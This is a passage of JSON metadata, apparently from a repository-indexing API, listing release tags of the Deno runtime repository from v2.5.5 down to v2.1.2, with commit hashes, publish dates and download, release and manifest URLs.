/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1",